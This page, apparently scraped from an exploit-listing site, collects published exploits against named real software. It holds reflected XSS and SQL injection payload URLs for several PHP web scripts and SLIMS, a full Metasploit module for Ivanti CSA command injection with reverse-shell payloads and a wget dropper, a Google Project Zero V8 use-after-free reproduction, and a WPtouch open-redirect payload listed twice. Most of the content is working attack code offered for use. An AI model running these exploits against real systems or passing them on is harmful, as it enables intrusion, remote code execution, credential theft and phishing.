Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Multi-Vendor Shopping Cart 3.2.3 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php Method: GET URL parameter 'page' is vulnerable to XSS https://www.website.com/index.php?page=product%2fcouponsh446k%3cimg%20src%3da%20onerror%3dalert(1)%3eciqs8 URL parameter 'keyword' is vulnerable to XSS https://www.website.com/index.php?page=product/productviews&keyword=tv24708%22%3balert(1)%2f%2f279 [-] Done </code></pre>

<pre><code>## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit ## Development: nu11secur1ty ## Date: 01.19.2023 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2 ## Description: The value of manual insertion `point 3` is copied into the HTML document as plain text between tags. The payload udz21<script>alert(1)</script>rk346 was submitted in manual insertion point 3. This input was echoed unmodified in the application's response. The attacker can trick the already logged-in user, to visit the exploit link that this attacker is created, and if this already logged-in user is not actually IT or admin, this will be the end of this system. ## STATUS: HIGH Vulnerability [+] Exploit: ``` GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1 Host: pwnedhost1.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2) ## Proof and Exploit: [href](https://streamable.com/zd6e18) ## Reference: [href](https://portswigger.net/web-security/cross-site-scripting) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ivanti Cloud Services Appliance (CSA) Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA) for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the Cloud Services Appliance before `4.6.0-512` allows an unauthenticated user to execute arbitrary code with limited permissions. Successful exploitation results in command execution as the `nobody` user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jakub Kramarz', # Discovery 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor ], 'References' => [ ['CVE', '2021-44529'], ['URL', 'https://forums.ivanti.com/s/article/SA-2021-12-02'], ['URL', 'https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529'], ['EDB', '50833'], ['PACKETSTORM', '166383'] ], 'DisclosureDate' => '2021-12-02', 'Platform' => ['unix', 'linux', 'php'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http' } } ], [ 'PHP Command', { 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['wget', 'printf', 'echo'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_http' } } ] ], 'Payload' => { 'BadChars' => '"' # We use this to denote the payload as a string so having it in the payload would escape things. }, 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end # Randomize the cookie pairs for the request. def randomize_cookie(payload) # Number of cookie pairs should be at least 4, and the first cookie pair should # always have the value 'ab'. Note that the Nth cookie in the request, where # N=no_of_cookies-2, should contain the payload. # # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=; # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=; no_of_cookies = rand(4..8) cookie_name = Rex::Text.rand_text_alphanumeric(1..8) payload_cookie_number = (no_of_cookies - 2) random_cookie = "#{cookie_name}=ab;" for cookie_no in 2..no_of_cookies do cookie_name = Rex::Text.rand_text_alphanumeric(1..8) if cookie_no == payload_cookie_number random_cookie << "#{cookie_name}=#{payload};" else random_cookie << "#{cookie_name}=;" end end return random_cookie end def check_vuln # check RCE by grabbing CSA version banner stored on /etc/LDBUILD payload = Base64.strict_encode64('readfile("/etc/LDBUILD");') cookie_payload = randomize_cookie(payload) return send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'client', 'index.php'), 'cookie' => cookie_payload.to_s }) rescue StandardError => e elog("#{peer} - Communication error occurred: #{e.message}", error: e) return nil end def execute_command(cmd, _opts = {}) case target['Type'] when :unix_cmd payload = Base64.strict_encode64("system(\"#{cmd}\");") when :php_cmd payload = Base64.strict_encode64(cmd.to_s) when :linux_dropper payload = Base64.strict_encode64("system(\"#{cmd}\");") end cookie_payload = randomize_cookie(payload) return send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'client', 'index.php'), 'cookie' => cookie_payload.to_s }) rescue StandardError => e elog("#{peer} - Communication error occurred: #{e.message}", error: e) fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") end def check print_status("Checking if #{peer} can be exploited.") res = check_vuln return CheckCode::Unknown('No response received from the target.') unless res return CheckCode::Safe unless res.code == 200 && !res.body.blank? && res.body =~ /<c123>/ begin parsed_html = Nokogiri::HTML.parse(res.body) rescue Nokogiri::SyntaxError => e return CheckCode::Unknown("Unable to parse the HTTP response! Error: #{e}") end csa_version = parsed_html.at_css('c123') if csa_version&.text&.blank? CheckCode::Vulnerable('Could not retrieve version.') else CheckCode::Vulnerable("Version: #{csa_version.text}") end end def exploit case target['Type'] when :unix_cmd print_status("Executing #{target.name} with #{payload.encoded}") execute_command(payload.encoded) when :php_cmd print_status("Executing #{target.name} with #{payload.encoded}") execute_command(payload.encoded) when :linux_dropper print_status("Executing #{target.name}") execute_cmdstager(linemax: 262144) end end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : Jettweb.net │ │ Vendor : Jettweb │ │ Software : Jettweb Ready Rent A Car Script V4 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ URL parameter 'id' is vulnerable to XSS Path: /rezervasyon.php https://example/rezervasyon.php?id=3mteyx%22%3e%3cscript%3ealert(1)%3c%2fscript%3esih3w [-] Done </code></pre>

<pre><code>Chrome: Copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess VULNERABILITY DETAILS Copy-on-write is one of V8's internal optimization features that allows multiple JavaScript objects to share the same element store. This feature is primarily used to optimize creation of JavaScript arrays from literals. It's important that every function that can add a new element to a JS object or modify an existing one first checks that the element store isn't marked as COW and makes a copy of the store if needed. Otherwise, the element will be unexpectedly changed for every object that uses the same store. Consider the implementation of the safety check in `JSNativeContextSpecialization::BuildElementAccess`: ``` JSNativeContextSpecialization::ValueEffectControl JSNativeContextSpecialization::BuildElementAccess( Node* receiver, Node* index, Node* value, Node* effect, Node* control, Node* context, ElementAccessInfo const& access_info, KeyedAccessMode const& keyed_mode) { [...] if (keyed_mode.access_mode() == AccessMode::kStore && IsSmiOrObjectElementsKind(elements_kind) && !IsCOWHandlingStoreMode(keyed_mode.store_mode())) { effect = graph()->NewNode( simplified()->CheckMaps( CheckMapsFlag::kNone, ZoneHandleSet<Map>(factory()->fixed_array_map())), elements, effect, control); } [...] } ``` The `CheckMaps` node is only inserted if the current access mode is `kStore`. However, there are other modes that can also result in storing an element, and one of them is `kDefine`. A call to the `Object.defineProperty` function won't lead to an access in this mode, but an attacker can take advantage of class field initialization to trigger it: ``` function ReturnHolder() { return define_property_holder } class Trigger extends ReturnHolder { 123 = new_value; } ``` The `Trigger` constructor will perform an element access that's equivalent to the expression `define_property_holder[123] = new_value`, but will set the access mode to `kDefine`, thus bypassing the safety check. There are likely multiple ways to exploit the issue. The approach the attached reproduction case takes is to create two `PACKED_SMI_ELEMENTS` arrays that share the element store and then get one of the arrays to transition to the `PACKED_ELEMENTS` kind and store a `HeapObject` element. Since copying elements from the corrupted Smi array to another Smi array won't trigger any write barriers, we can hide the pointer from the garbage collector in a new array and trigger a use-after-free on a V8 heap address. VERSION V8 version 10.9.0 (candidate) Google Chrome 107.0.5304.87 (Official Build) (64-bit) REPRODUCTION CASE ``` function ForceGC() { try { new ArrayBuffer(2 ** 34); } catch {} } old_space_array = Array(1, 2); function CopyElement(from, to) { to[0] = from[0]; } // no write barrier for smi arrays for (let i = 0; i < 10000; ++i) { CopyElement(old_space_array, old_space_array); } ForceGC(); function MakeCOW() { return [0]; } original_cow_object = MakeCOW(); function MakeCopy() { let copy = original_cow_object.concat(); // create a new object with COW elements copy.splice(); // copy the elements return copy; } new_value = 1; new_value = {}; // mark the cell as mutable function ReturnHolder() { return define_property_holder } class Trigger extends ReturnHolder { 0 = new_value; } for (let i = 0; i < 10000; ++i) { define_property_holder = MakeCopy(); new Trigger(); } new_value = {}; define_property_holder = MakeCOW(); new Trigger(); new_space_array = MakeCOW(); new_space_array.splice(); CopyElement(new_space_array, old_space_array); new_value = \"\"; define_property_holder = MakeCOW(); new Trigger(); new_space_array = null; ForceGC(); console.log(old_space_array[0][0]); ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-06. Found by: glazunov@google.com </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : Activeitzone.com │ │ Vendor : ActiveITzone │ │ Software : Active eCommerce CMS 6.5.0 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /ecommerce/search GET parameter 'keyword' is vulnerable to SQLI https://www.website.com/ecommerce/search?selected_attribute_values%5B%5D=M&selected_attribute_values%5B%5D=Chenille&color=%23CD5C5C&keyword=G502[INJECT-HERE] [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : Jettweb.net │ │ Vendor : Jettweb │ │ Software : PHP Hazır Haber Sitesi Scripti V3 - PHP Instant News Site (HaberScript03) │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /fonksiyonlar.php POST parameter 'haberid' is vulnerable to SQLI https://www.website.com/fonksiyonlar.php?fgit=yorumlar&haberid=95[SQL-Inject-HERE] [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress - WPtouch 3.7.5 Open Redirect Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://wordpress.org/plugins/wptouch/ | | # Dork : wp-content/plugins/wptouch/ | ==================================================================================================================================== P0C : == Description == WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website. When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device Desktop browsing does not allow you to convert But if we use the payload then it is possible. This URL Redirection vulnerability allows remote Attackers to redirect users to arbitrary websites and conduct phishing attacks [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a [+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress - WPtouch 4.3.47 Open Redirect Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://wordpress.org/plugins/wptouch/ | | # Dork : wp-content/plugins/wptouch/ | ==================================================================================================================================== P0C : == Description == WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website. When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device Desktop browsing does not allow you to convert But if we use the payload then it is possible. This URL Redirection vulnerability allows remote Attackers to redirect users to arbitrary websites and conduct phishing attacks [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a [+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | | ======================================================================================================================================= </code></pre>